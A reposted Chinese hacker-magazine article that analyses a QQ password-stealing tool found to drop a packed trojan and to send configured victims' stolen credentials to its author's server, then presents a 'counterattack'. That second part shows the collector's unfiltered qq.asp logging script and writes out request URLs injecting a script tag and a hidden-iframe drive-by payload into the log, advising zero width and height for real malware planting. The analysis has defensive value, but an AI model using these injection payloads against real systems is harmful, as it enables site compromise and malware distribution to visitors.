QQ盗号软件后门分析与反击
生活随笔
收集整理的這篇文章主要介紹了
QQ盗号软件后门分析与反击
小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
作者:fhod 小財(cái)
說(shuō)明:文章已發(fā)表于***手冊(cè)07年10期,轉(zhuǎn)載請(qǐng)注明出處!
對(duì)明小子QQ密碼特工軟件的分析 ----小財(cái)
今天無(wú)聊給一朋友講解QQ盜取原理,從網(wǎng)上找了一個(gè)工具 “明小子QQ密碼特工”結(jié)果發(fā)現(xiàn)這個(gè)軟件有后門。下面就讓我?guī)е蠹襾?lái)分析一下。
首先我們用nod32來(lái)查一下有沒(méi)有毒。圖1
看到了吧沒(méi)有病毒。我們把監(jiān)控打開(kāi)在運(yùn)行看看圖2
看到了吧 NOD32檢測(cè)到了病毒。為了確認(rèn)一下。我再用‘***輔助查找器’的文件監(jiān)視功能來(lái)檢測(cè)下。
圖3
新建 C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\123.exe
很明顯軟件本身在運(yùn)行的同時(shí)釋放了一個(gè)123.exe 而NOD32查殺到的也就是這個(gè)文件。
C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\
接著我們用peid查下123.exe. 圖4
EP段.nsp1經(jīng)常搞免殺的應(yīng)該知道這是北斗加的殼,我們?cè)倏纯磪^(qū)段vmp 圖5
這個(gè)一看就是用vmprotect做的免殺。至于123.exe是什么***咱門就不繼續(xù)分析了。
接下來(lái)分析他生成后的文件是不是一樣令人擔(dān)憂。
隨便配置一個(gè)圖6
Ollydbg手工給他脫殼esp定律簡(jiǎn)單 圖7
脫殼成功后我們?cè)谟肞EID檢測(cè)下 圖8
我們?cè)儆胏32asm對(duì)他進(jìn)行反匯編,搜索asp圖9
看到了什么 .剛才我是默認(rèn)設(shè)置的應(yīng)該是[url]http://k.thec.cn/xieming/69q/qq.asp[/url]才對(duì)。,怎么會(huì)是[url]http://langyeqq.cn/qq/newbacka.asp[/url] 這個(gè)呢!我們?yōu)g覽看看 圖10
"pzQQ"看到了吧,說(shuō)明就是他的盜號(hào)的,從這些可以確定,這個(gè)軟件不但運(yùn)行的時(shí)候施放一個(gè)***,而且就連我們配置好的文件也被他留了后門,而作者就坐等著收號(hào)了。
后門反擊戰(zhàn) 作者:fhod[E.S.T VIP]
看到這..想必大家也和我一樣非常氣憤..難道我們就任由作者下去嗎.當(dāng)然不..現(xiàn)在我們就開(kāi)始反擊.
我們來(lái)看看qq.asp的代碼
首先來(lái)看
strLogFile="Q7.txt"
這個(gè)是QQ接受文件..默認(rèn)的是q7.txt
繼續(xù)看代碼
QQNumber=request("QQNumber")
QQPassWord=request("QQPassWord")
QQclub=request("QQclub")
QQip=request("QQip")
是沒(méi)經(jīng)過(guò)任何過(guò)濾的..這些參數(shù)的數(shù)據(jù)我們完全可以自定義
在往下看
if QQNumber="" or QQPassWord="" then
response.write "pzQQ"
response.end
假如QQNumber和QQPassWord的值為空就返回pzQQ .然后程序結(jié)束工作.. 只要這兩個(gè)值不為空就繼續(xù)執(zhí)行下面的代碼
StrLogText =StrLogText&QQNumber&"----"&QQPassWord&"----會(huì)員:"& QQclub&"----IP:"&QQip&"("&request.servervariables("REMOTE_HOST")
StrLogText=StrLogText&")"
寫入q7.txt文件
格式為 QQ號(hào)碼----QQ密碼----會(huì)員:----IP:
繼續(xù)看下面的代碼
set f=Server.CreateObject("scripting.filesystemobject") (沒(méi)有q7.txt這個(gè)文件就自動(dòng)新建)
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(StrLogText) (打開(kāi)q7.txt并寫入數(shù)據(jù))
最后response.write "發(fā)送成功!" 滿足條件提示成功.
所有的代碼也就是這些..程序并未做任何過(guò)濾..和處理..也就是說(shuō)..只要滿足qq.asp?QQNumber=123&QQPassWord=123 就回返回 "發(fā)送成功!"的提示.
[url]http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=123[/url]
圖11
這就證明了QQNumber=123&QQPassWord=123這兩個(gè)我們是可以自己定義的..如果我們寫入的不是數(shù)字..而且一段腳本代碼呢?會(huì)不會(huì)執(zhí)行呢..讓我們來(lái)試下
[url]http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=[/url]< ... quot;fhod")</script>
圖12
插入代碼成功...我們來(lái)看下
[url]http://www.ciker.org/soft/q7.txt[/url]的源文件又是什么樣的..
圖13
再次證明對(duì)提交的數(shù)據(jù)是無(wú)任何限制的...我們完全可以自己發(fā)揮想象.插入任何代碼都可以...
如果想反掛馬的話..我們就可以提交以下數(shù)據(jù)
[url]http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=[/url]<iframe%20&# ... 20width=480%20height=480></iframe>
圖14
當(dāng)然我這里把width和height設(shè)置為480只是為了方便演示..實(shí)際掛馬中要改為0
好了..現(xiàn)在我們就可以給作者一個(gè)驚喜去了..圖15
本文鏈接地址:[url]http://www.huaidan.org/blog/?id=1429[/url]
轉(zhuǎn)載于:https://blog.51cto.com/foxhack/48001
總結(jié)
以上是生活随笔為你收集整理的QQ盗号软件后门分析与反击的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 合作开发(Eclipse+git +码云
- 下一篇: 十分钟入门Matplotlib